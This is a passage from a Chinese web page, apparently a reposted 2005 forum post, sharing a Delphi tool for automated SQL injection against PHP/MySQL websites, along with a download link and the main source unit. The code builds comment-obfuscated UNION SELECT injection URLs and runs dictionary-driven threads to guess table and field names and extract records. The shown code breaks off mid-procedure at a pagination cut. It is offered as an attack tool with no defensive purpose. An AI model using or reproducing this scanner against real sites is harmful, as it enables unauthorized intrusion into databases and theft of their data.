PHP+MYSQL网站注入扫描

简介：PHP+MYSQL网站注入扫描工具，针对类似夜猫文章下
载系统比较有效，界面是仿教程的hdsi中的PHP注入模块写
的，实现原理是参考angel的SQL Injection with MYSQL
写的，网上有很多，不再细说。

界面截图：http://www.wrsky.com/attachment/3_1891.jpg

源码下载：http://downloads.2ccc.com/general/internet_lan/PHPInj.rar

Author: hnxyy
QQ: 19026695
Date: 2005/5/25

FireFox技术交流论坛
http://www.wrsky.com
It is all beginnings free
It is all ruin to be privately owned

使用D7编写，界面比较难看，和教主的工具对比了一下，感觉比他的工作扫描速度要快很多

主要单元代码：

unit Unit1;

interface

uses
Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
Dialogs, Spin, StdCtrls, ComCtrls, Buttons, ExtCtrls, IDHTTP, unit2, Unit3,
OleCtrls, SHDocVw;

type
TForm1 = class(TForm)
  Panel8: TPanel;
  Label15: TLabel;
  Label16: TLabel;
  Label17: TLabel;
  EdtInjUrl: TEdit;
  EdtKey: TEdit;
  EdtFieldNum: TEdit;
  rdbNum: TRadioButton;
  rdbChar: TRadioButton;
  Panel1: TPanel;
  pcPHPInj: TPageControl;
  TabSheet1: TTabSheet;
  sbscan1: TSpeedButton;
  sbstop1: TSpeedButton;
  sbscan2: TSpeedButton;
  sbstop2: TSpeedButton;
  Panel15: TPanel;
  GroupBox5: TGroupBox;
  lvTable: TListView;
  GroupBox6: TGroupBox;
  lvField: TListView;
  TabSheet2: TTabSheet;
  GroupBox7: TGroupBox;
  Label18: TLabel;
  Label19: TLabel;
  Label20: TLabel;
  Label21: TLabel;
  spField1: TSpinEdit;
  spField2: TSpinEdit;
  EdtField1: TEdit;
  EdtField2: TEdit;
  EdtTable: TEdit;
  EdtID: TEdit;
  GroupBox8: TGroupBox;
  Label22: TLabel;
  EdtFileName: TEdit;
  sbrecord: TSpeedButton;
  sbfile: TSpeedButton;
  MM: TMemo;
  sbscan: TSpeedButton;
  TabSheet3: TTabSheet;
  lsbDict: TListBox;
  TabSheet4: TTabSheet;
  wb: TWebBrowser;
  spNum: TSpinEdit;
  GroupBox1: TGroupBox;
  sbscan3: TSpeedButton;
  sbstop3: TSpeedButton;
  ListBox1: TListBox;
  TabSheet5: TTabSheet;
  MMAbout: TMemo;
  StatusBar1: TStatusBar;
  procedure sbscanClick(Sender: TObject);
  procedure sbstop1Click(Sender: TObject);
  procedure sbscan1Click(Sender: TObject);
  procedure sbscan2Click(Sender: TObject);
  procedure lvFieldClick(Sender: TObject);
  procedure lvTableClick(Sender: TObject);
  procedure sbrecordClick(Sender: TObject);
  procedure sbfileClick(Sender: TObject);
  procedure sbstop2Click(Sender: TObject);
  procedure sbscan3Click(Sender: TObject);
  procedure sbstop3Click(Sender: TObject);
  procedure ListBox1Click(Sender: TObject);
  procedure FormShow(Sender: TObject);
private
  { Private declarations }
  Url,KeyWord:string;
  iStr,InjUrl:string;
  //弹出信息框
  procedure MsgBox(strMsg: string);
  procedure SetUrl;
  function Get(URL,Key: string): boolean;
  procedure InjTable;
  procedure FieldThreadExit(sender: TObject);
  procedure ManagerThreadExit(sender: TObject);
public
  { Public declarations }
  pg1:TProgressBar;
end;

var
Form1: TForm1;
//scanTable :array of scanTableThread; // 定义线程数组
scanField :array of scanFieldThread;
scanManager :array of scanManagerThread;
scanTable: scanTableThread; //扫描表段线程
isFinish:boolean=false;

N:integer=0;
M:integer=0;

implementation


{$R *.dfm}

{ TForm1 }

procedure TForm1.MsgBox(strMsg: string);
begin
Application.MessageBox(pchar(strMsg), ''''提示信息'''', mb_iconinformation);
end;

procedure TForm1.SetUrl;
begin
begin
if rdbNum.Checked then
  Url := trim(EdtInjUrl.Text)
else
  Url := trim(EdtInjUrl.Text)+#39;
end;
end;

procedure TForm1.sbscanClick(Sender: TObject);
var
scan:scanThread;
begin
if (EdtInjUrl.Text='''''''') then
begin
  MsgBox(''''请输入要注入的地址！'''');
  exit;
end;
if (EdtKey.Text='''''''') then
begin
  MsgBox(''''请输入要注入的关键字！'''');
  exit;
end;
SetUrl;
KeyWord:=trim(EdtKey.Text);
pg1.Visible :=False;
//scan :=scanThread.Create(Url,KeyWord,MM);
scan :=scanThread.Create(False);
end;

function TForm1.Get(URL,Key: string): boolean;
var
IDHTTP: TIDHttp;
ss: String;
begin
Result:= False;
IDHTTP:= TIDHTTP.Create(nil);
try
  try
    idhttp.HandleRedirects:= true;   //必须支持重定向否则可能出错
    idhttp.ReadTimeout:= 30000;     //超过这个时间则不再访问
    ss:= IDHTTP.Get(URL);
    if Key='''''''' then
    begin
    if IDHTTP.ResponseCode=200 then
      Result :=true;
    end else
    begin
    if (IDHTTP.ResponseCode=200) and (pos(Key,ss)>0) then
      Result :=true;
    end;
  except
  end;
finally
  IDHTTP.Free;
end;
end;

procedure TForm1.sbstop1Click(Sender: TObject);
begin
stoped :=True;
pg1.Visible :=False;
end;

//不使用线程
procedure TForm1.InjTable;
var
i,j:integer;
begin
if (iStr='''''''') or (KeyWord='''''''') then exit;
lsbDict.Items.Clear;
lvTable.Items.Clear;
lsbDict.Items.LoadFromFile(ExtractFilePath(Application.ExeName)+''''Dict_Table.txt'''');
j:=0;
isFinish :=False;
Screen.Cursor :=crHourGlass;
try
  for i:=0 to lsbDict.Count-1 do
  begin
    if isFinish then break;
    InjUrl:=Url+''''/**/and/**/1=1/**/union/**/select/**/''''+iStr+
        ''''/**/from/**/''''+lsbDict.Items+''''/*'''';

    MM.Lines.Add(InjUrl);
    if Get(InjUrl,KeyWord) then
    begin
    inc(j);
    with lvTable.Items.Add do
    begin
      Caption :=IntToStr(j);
      SubItems.Add(lsbDict.Items);
    end;
    end;
  end;
finally
  Screen.Cursor :=crDefault;
end;
end;

procedure TForm1.sbscan1Click(Sender: TObject);
var
i:integer;
begin
if (strtoint(EdtFieldNum.Text)<=0) or (KeyWord='''''''') then exit;
lsbDict.Items.Clear;
lvTable.Items.Clear;
N :=0;
lsbDict.Items.LoadFromFile(ExtractFilePath(Application.ExeName)+''''Dict_Table.txt'''');
isFinish :=False;
for i:=1 to strtoint(EdtFieldNum.Text) do
  iStr:=iStr+'''',''''+IntToStr(i);
iStr :=copy(iStr,2,length(iStr)-1);
//在一个线程内完成表段猜解工作
scanTable :=scanTableThread.Create(Url,iStr,KeyWord,MM,lvTable);
end;

procedure TForm1.sbscan2Click(Sender: TObject);
var
i,j,Sum:integer;
tablename:string;
begin
if lvTable.Items.Count<=0 then exit;
if lvTable.SelCount<=0 then
begin
  MsgBox(''''请选择一个表名！'''');
  exit;
end;
tablename :=trim(lvTable.Selected.SubItems.GetText);
if tablename='''''''' then exit;

if isFinish=False then
begin
  lsbDict.Items.Clear;
  lvField.Items.Clear;
  MM.Clear;
  N :=0;
  lsbDict.Items.LoadFromFile(ExtractFilePath(Application.ExeName)+''''Dict_Field.txt'''');
  Sum :=lsbDict.Count;
  iStr :='''''''';
    pg1.Min :=0;
  pg1.Max :=sum;
  pg1.Step :=1;
  pg1.Position :=0;
  pg1.Visible :=true;
  MM.Lines.Add(''''开始猜解字段。。。'''');
  MM.Lines.Add('''''''');
  for i:=1 to strtoint(EdtFieldNum.Text) do
  begin
    if i=strtoint(spNum.Text) then
    iStr :=iStr+'''',&FIELDNAME&''''
    else iStr :=iStr+'''',''''+inttostr(i);
  end;
  if iStr<>'''''''' then
    iStr :=copy(iStr,2,length(iStr)-1);

  SetLength(scanField,Sum);   // 动态设置线程的数量
  //创建多个线程完成字段猜解
  for j:=0 to Sum-1 do
  begin
    //if isFinish then exit;
    scanField[j] := scanFieldThread.Create(Url,iStr,KeyWord,tablename,j,MM,lvField);
    scanField[j].OnTerminate := FieldThreadExit;
  end;
  // sbscan2.Caption :=''''停止'''';
end;

try
  if isFinish=true then
  begin
    //if N>=lsbDict.Count then exit;
    if sbscan2.Caption=''''停止'''' then
    begin
    for j:=N to lsbDict.Count-1 do
    begin
      if scanField[j].FreeOnTerminate then
      begin
        scanField[j].Suspend;
        scanField[j].Free;
        //scanField[j].Terminate;
      end;
    end;
    end;
    MM.Lines.Add('''''''');
    MM.Lines.Add(''''字段猜解结束。。。'''');
  // sbscan2.Caption :=''''猜解'''';
  end;
except
end;

isFinish :=true;
end;

procedure TForm1.Fiel

[1] [2] [3] [4] [5] [6] [7] [8] [9] [10]  ...  下一页 >> 

Copyright ＠ 2007-2012 敏韬网(敏而好学，文韬武略--MinTao.Net)（学习笔记） Inc All Rights Reserved.
闵涛 E_mail:admin@mintao.net(欢迎提供学习资源)

鄂公网安备 42011102001154号

站长：MinTao ICP备案号：鄂ICP备11006601号-18